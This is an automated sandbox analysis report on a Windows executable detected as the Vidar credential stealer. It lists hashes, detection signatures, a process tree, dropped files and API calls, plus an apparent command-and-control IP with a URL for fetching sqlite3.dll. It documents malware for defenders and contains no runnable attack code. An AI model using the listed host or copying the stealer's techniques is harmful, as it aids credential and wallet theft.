Windows Analysis Report br4Cu3BycW.exe

Overview

General Information

Sample Name:br4Cu3BycW.exe
Analysis ID:492023
MD5:ec72a93f6279b16006f2196f330166ee
SHA1:74b4d4a19500d3644a6a4f523ad7d4adcb1ace6f
SHA256:4340bc1e1ddb5d268a010401be96435063de733a2601d158d13f56da9f20df5d
Tags:exe

Detection

Vidar
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
PE file has a writeable .text section
.NET source code contains in memory code execution
Found many strings related to Crypto-Wallets (likely being stolen)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to launch a program with higher privileges
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • br4Cu3BycW.exe (PID: 4352 cmdline: 'C:\Users\user\Desktop\br4Cu3BycW.exe' MD5: EC72A93F6279B16006F2196F330166EE)
    • br4Cu3BycW.tmp (PID: 5816 cmdline: 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' MD5: EEB69F7B86959AE72B9D37443FB7F3D0)
      • br4Cu3BycW.exe (PID: 5092 cmdline: 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT MD5: EC72A93F6279B16006F2196F330166EE)
        • br4Cu3BycW.tmp (PID: 5636 cmdline: 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT MD5: EEB69F7B86959AE72B9D37443FB7F3D0)
          • CrystalReports.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe' MD5: 11DD538F1BF5F174834DBA334964A691)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: CrystalReports.exe PID: 6532 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: CrystalReports.exe PID: 6532 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        AV Detection:

        Multi AV Scanner detection for submitted file
        Source: br4Cu3BycW.exeReversingLabs: Detection: 28%
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)ReversingLabs: Detection: 11%
        Source: br4Cu3BycW.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
        Source: br4Cu3BycW.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: Microsoft.ReportViewer.ProcessingObjectModel.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp
        Source: Binary string: D:\projects\capsa\output\x64_Release\pdb\tsharkdecode.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmp
        Source: Binary string: C:\lib\source\Programming\pdb\V\qt\YordansDev\SoftwareIdeasMod.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb, source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040AEF4 FindFirstFileW,FindClose,1_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,1_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040AEF4 FindFirstFileW,FindClose,5_2_0040AEF4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040A928
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060C2B0 FindFirstFileW,GetLastError,6_2_0060C2B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E6A0 FindFirstFileW,FindClose,6_2_0040E6A0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,6_2_0040E0D4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,6_2_006B8DE4
        Source: global trafficTCP traffic: 192.168.2.3:49750 -> 147.135.170.166:80
        Source: unknownTCP traffic detected without corresponding DNS query: 147.135.170.166
        Source: CrystalReports.exe, 00000007.00000002.562905629.000000000298E000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.562973809.00000000029C9000.00000004.00000001.sdmpString found in binary or memory: http://147.135.170.166/
        Source: CrystalReports.exe, 00000007.00000002.562956056.00000000029BC000.00000004.00000001.sdmpString found in binary or memory: http://147.135.170.166/public/sqlite3.dll

        System Summary:

        PE file has a writeable .text section
        Source: is-7MTO8.tmp.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 5_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,5_2_004AF110
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,6_2_0060F6D8
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: br4Cu3BycW.exe, 00000001.00000003.292227773.00000000025F0000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000001.00000003.302497238.0000000002378000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000005.00000000.298033659.00000000004C6000.00000002.00020000.sdmpBinary or memory string: OriginalFileName vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exe, 00000005.00000003.320593435.0000000000A68000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs br4Cu3BycW.exe
        Source: br4Cu3BycW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: br4Cu3BycW.tmp.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: is-7MTO8.tmp.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeSection loaded: sqlite3.dll
        Source: is-33ENG.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: is-5P6B9.tmp.6.drStatic PE information: Number of sections : 14 > 10
        Source: is-KTI9L.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: is-VO510.tmp.6.drStatic PE information: Number of sections : 12 > 10
        Source: is-FCT1V.tmp.6.drStatic PE information: Number of sections : 13 > 10
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile read: C:\Users\user\Desktop\br4Cu3BycW.exe
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe'
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe'
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\Desktop\br4Cu3BycW.exe 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe'
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\Programs
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp
        Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@9/191@0/1
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_0062CFB8 GetVersion,CoCreateInstance,3_2_0062CFB8
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0041A4DC GetDiskFreeSpaceW,1_2_0041A4DC
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: CrystalReports.exe, 00000007.00000002.562307914.00000000007A7000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,1_2_004AF9F0
        Source: br4Cu3BycW.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpWindow found: window name: TMainForm
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: br4Cu3BycW.exeStatic file information: File size 5124457 > 1048576

        Data Obfuscation:

        .NET source code contains in memory code execution
        Source: is-N95UU.tmp.6.dr, FileHelpers/RunTime/ClassBuilder.cs.Net Code: CompilerParametersGenerateInMemory(true) and CompilerParameters.GenerateExecutable(false)
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B5000 push 004B50DEh; ret 1_2_004B50D6
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B5980 push 004B5A48h; ret 1_2_004B5A40
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458000 push ecx; mov dword ptr [esp], ecx1_2_00458005
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049B03C push ecx; mov dword ptr [esp], edx1_2_0049B03D
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A00F8 push ecx; mov dword ptr [esp], edx1_2_004A00F9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458084 push ecx; mov dword ptr [esp], ecx1_2_00458089
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B1084 push 004B10ECh; ret 1_2_004B10E4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A1094 push ecx; mov dword ptr [esp], edx1_2_004A1095
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0041A0B4 push ecx; mov dword ptr [esp], ecx1_2_0041A0B8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004270BC push 00427104h; ret 1_2_004270FC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458108 push ecx; mov dword ptr [esp], ecx1_2_0045810D
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004321C8 push ecx; mov dword ptr [esp], edx1_2_004321C9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A21D8 push ecx; mov dword ptr [esp], edx1_2_004A21D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049E1B8 push ecx; mov dword ptr [esp], edx1_2_0049E1B9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049A260 push 0049A378h; ret 1_2_0049A370
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00455268 push ecx; mov dword ptr [esp], ecx1_2_0045526C
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004252D4 push ecx; mov dword ptr [esp], eax1_2_004252D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004592FC push ecx; mov dword ptr [esp], edx1_2_004592FD
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0045B284 push ecx; mov dword ptr [esp], edx1_2_0045B285
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00430358 push ecx; mov dword ptr [esp], eax1_2_00430359
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00430370 push ecx; mov dword ptr [esp], eax1_2_00430371
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00459394 push ecx; mov dword ptr [esp], ecx1_2_00459398
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A1428 push ecx; mov dword ptr [esp], edx1_2_004A1429
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049B424 push ecx; mov dword ptr [esp], edx1_2_0049B425
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A24D8 push ecx; mov dword ptr [esp], edx1_2_004A24D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004224F0 push 004225F4h; ret 1_2_004225EC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004304F0 push ecx; mov dword ptr [esp], eax1_2_004304F1
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00499490 push ecx; mov dword ptr [esp], edx1_2_00499493
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458564 push ecx; mov dword ptr [esp], edx1_2_00458565
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458574 push ecx; mov dword ptr [esp], edx1_2_00458575
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00457574 push ecx; mov dword ptr [esp], ecx1_2_00457578
        Source: br4Cu3BycW.exeStatic PE information: section name: .didata
        Source: br4Cu3BycW.tmp.1.drStatic PE information: section name: .didata
        Source: br4Cu3BycW.tmp.5.drStatic PE information: section name: .didata
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: /4
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: .xdata
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: /14
        Source: is-VO510.tmp.6.drStatic PE information: section name: .xdata
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: /4
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: .xdata
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: /14
        Source: is-33ENG.tmp.6.drStatic PE information: section name: /4
        Source: is-33ENG.tmp.6.drStatic PE information: section name: .xdata
        Source: is-33ENG.tmp.6.drStatic PE information: section name: /14
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: /4
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: .xdata
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: /14
        Source: is-TECE4.tmp.6.drStatic PE information: section name: /4
        Source: is-D43R5.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x1a0ba
        Source: br4Cu3BycW.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x315aa3
        Source: br4Cu3BycW.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x315aa3
        Source: is-7MTO8.tmp.6.drStatic PE information: real checksum: 0x4ae8ac should be: 0x4b55ab
        Source: is-Q7NRR.tmp.6.drStatic PE information: real checksum: 0x4351e8 should be: 0x4554a2
        Source: br4Cu3BycW.exeStatic PE information: real checksum: 0x0 should be: 0x4ec8cf
        Source: is-5P6B9.tmp.6.drStatic PE information: 0xA5E8A5E0 [Sat Mar 16 06:57:36 2058 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libssl-40.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmpJump to dropped file
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmpJump to dropped file
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)Jump to dropped file
